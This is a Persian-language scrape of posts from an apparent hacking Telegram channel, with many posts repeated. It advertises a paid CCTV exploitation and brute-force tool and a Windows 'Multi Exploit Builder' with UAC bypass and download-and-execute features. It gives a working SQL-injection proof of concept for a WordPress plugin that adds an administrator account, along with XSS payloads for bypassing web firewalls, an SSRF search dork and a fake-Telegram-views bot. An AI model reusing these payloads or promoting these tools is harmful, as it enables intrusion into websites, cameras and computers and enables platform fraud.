به حرفاتون دقت کنید
بفهمید چه چیزی رو چه وقتی به کی میگید
کلمه ها ممکنه وزنشون سنگین باشه
بفهمید چه چیزی رو چه وقتی به کی میگید
کلمه ها ممکنه وزنشون سنگین باشه
ابزار Exploiter CCTV
این ابزار تشکیل شده از اکسپلویت های مختلف و متد های جدید برای بای پس پنل های ادمین است!
ما در این ابزار سعی کردیم بروز ترین روش های تست نفوذ به دوربین های مداربسته رو جا بدیم
این ابزار دارای اکسپلویت های مختلف برای دوربین های
DVR, XVR, HVR, CeNova, Novo, HIKVISION
است
و میتواند ایپی دوربین های مداربسته کشور های مختلف را پیدا کند (و اطراف خود)
علاوه بر این یک اپشن درحال تکمیل است برای حملات بروت فورس بر روی پنل دوربین ها که بزودی با کمک شما این اپشن تکمیل میشه! خریداران فقط کافیه ایپی های دوربین مداربسته های مختلف رو بفرستند و سپس میتوانند از اپدیت های بعدی ابزار رایگان استفاده کنند!
این ابزار فقط به 6 نفر فروخته میشود!
نوشته شده با Python/Bash
برای خرید به ایدی زیر پیام بدید
ID: @ServerKill3r
این ابزار تشکیل شده از اکسپلویت های مختلف و متد های جدید برای بای پس پنل های ادمین است!
ما در این ابزار سعی کردیم بروز ترین روش های تست نفوذ به دوربین های مداربسته رو جا بدیم
این ابزار دارای اکسپلویت های مختلف برای دوربین های
DVR, XVR, HVR, CeNova, Novo, HIKVISION
است
و میتواند ایپی دوربین های مداربسته کشور های مختلف را پیدا کند (و اطراف خود)
علاوه بر این یک اپشن درحال تکمیل است برای حملات بروت فورس بر روی پنل دوربین ها که بزودی با کمک شما این اپشن تکمیل میشه! خریداران فقط کافیه ایپی های دوربین مداربسته های مختلف رو بفرستند و سپس میتوانند از اپدیت های بعدی ابزار رایگان استفاده کنند!
این ابزار فقط به 6 نفر فروخته میشود!
نوشته شده با Python/Bash
برای خرید به ایدی زیر پیام بدید
ID: @ServerKill3r
اقا دیدم یه ابزار خوبی برای ویو فیک تلگرام هست که از طریق پروکسی های Socks5/4,Http/s میتونید اینکارو خیلی ایزی انجام بدید
Link: https://github.com/TeaByte/telegram-views
احتمالا ری اکشن فیک رو بزارم، چون جایی ندیدم باشه
Link: https://github.com/TeaByte/telegram-views
احتمالا ری اکشن فیک رو بزارم، چون جایی ندیدم باشه
GitHub
GitHub - vwh/telegram-views: Asynchronous Telegram view automation with proxy rotation and auto-proxy scraping
Asynchronous Telegram view automation with proxy rotation and auto-proxy scraping - vwh/telegram-views
خیلیا تو این کانال اهل گیم و چیت و... هستن
احتمالا با چندتا از ادمین ها یه پیج اینستا قراره ساخته بشه مختص چیت و Cp و...
بزودی برنامه ها چیده میشه، واقعا فعلا سرم شلوغه ولی بالاخره تموم میشه
احتمالا با چندتا از ادمین ها یه پیج اینستا قراره ساخته بشه مختص چیت و Cp و...
بزودی برنامه ها چیده میشه، واقعا فعلا سرم شلوغه ولی بالاخره تموم میشه
Bricks <= 1.9.6 در برابر اجرای کد از راه دور تایید نشده (RCE) آسیب پذیر است، به این معنی که هر کسی می تواند دستورات دلخواه را اجرا کند و سایت/سرور را تحت کنترل خود درآورد.
توضیحات کامل: https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
توضیحات کامل: https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
امروز چند دقیقه وقت گذاشتم تا #آسیب پذیری #امنیتی #افزونه وردپرس خودکار CVE-2024-27956 (اجرای SQL خودسرانه تایید نشده) را تجزیه و تحلیل کنم. معلوم شد که بهره برداری از آن بسیار آسان است. در اینجا یک PoC اساسی وجود دارد: از آنجایی که "q" مستقیماً به فراخوانی $wpdb->get_results() ارسال می شود، می توانید دستورات SQL را مستقیماً اجرا کنید. افزودن یک کاربر جدید وردپرس:
دادن حقوق مدیریت کاربر:
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW ()، 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
تصویر اولدادن حقوق مدیریت کاربر:
q=INSERT INTO wp_usermeta (user_id، meta_key، meta_value) VALUES (6، 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')، (6 , 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c
تصویر دوم┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
با این کوئری ها میتونین آخرین توییتهای مربوط به پلتفرم مدنظر خودتون رو در باگ بانتی ببینین
روشهای خوبی ارائه میدن
(from:hacker0x01 OR from:bugcrowd OR from:intigriti OR from:yeswehack OR from:synack OR from:hackenproof OR from:zerocopter OR from:immunefi) -filter:replies
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
روشهای خوبی ارائه میدن
(from:hacker0x01 OR from:bugcrowd OR from:intigriti OR from:yeswehack OR from:synack OR from:hackenproof OR from:zerocopter OR from:immunefi) -filter:replies
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
پیلودهای زیر ممکنه برای XSS WAF Bypass مخصوصا cloudflare جواب بدهند که توی رایتاب های اخیر دیدم:
└< (main)* >─» @Team_Exploit
<select><style></select>
<svg onload=alert(1)>
</style>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
گوگل دورک - SSRF
inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Forwarded from esfelurm
Multi Exploit Builder V1
Feature List :
UAC Exploit
Download and Execute Exploit
Windows Shortcut EXploit
UAC Exploit
Using Vbs script
Using Reg
UAC Enable
Using Reg File
Download and Execute Exploit
Reg
Hta
VBS
wfs
ps1
url
cmd
bat
Windows Shortcut EXploit
wav
ps1
png
ini
txt
log
mid
jpg
psc1
dll
gif
ico
dat
xml
hta
cmd
jnt
mp3
cpl
html
ppt
vbs
iso
hlp
rar
ocx
zip
pptx
wfs
js
doc
xls
msi
pdf
url
𝙲𝙷𝙰𝙽𝙽𝙴𝙻 : [@KnightGuardian59]
Feature List :
UAC Exploit
Download and Execute Exploit
Windows Shortcut EXploit
UAC Exploit
Using Vbs script
Using Reg
UAC Enable
Using Reg File
Download and Execute Exploit
Reg
Hta
VBS
wfs
ps1
url
cmd
bat
Windows Shortcut EXploit
wav
ps1
png
ini
txt
log
mid
jpg
psc1
dll
gif
ico
dat
xml
hta
cmd
jnt
mp3
cpl
html
ppt
vbs
iso
hlp
rar
ocx
zip
pptx
wfs
js
doc
xls
msi
url
𝙲𝙷𝙰𝙽𝙽𝙴𝙻 : [@KnightGuardian59]
انصافا یکم ادم باشید
ابزاری که رایگان براتون میزارم رو نرید کامپایل کنید بفروشید به بقیه
من حالا نمیام اسکرین بزارم بگم فلانی و فلانی این کارو کردن، ابروی کسی هم تو این کانال نبردم
از اعتماد ممبر هاتون به خودتون خجالت بکشید:/
ابزاری که رایگان براتون میزارم رو نرید کامپایل کنید بفروشید به بقیه
من حالا نمیام اسکرین بزارم بگم فلانی و فلانی این کارو کردن، ابروی کسی هم تو این کانال نبردم
از اعتماد ممبر هاتون به خودتون خجالت بکشید:/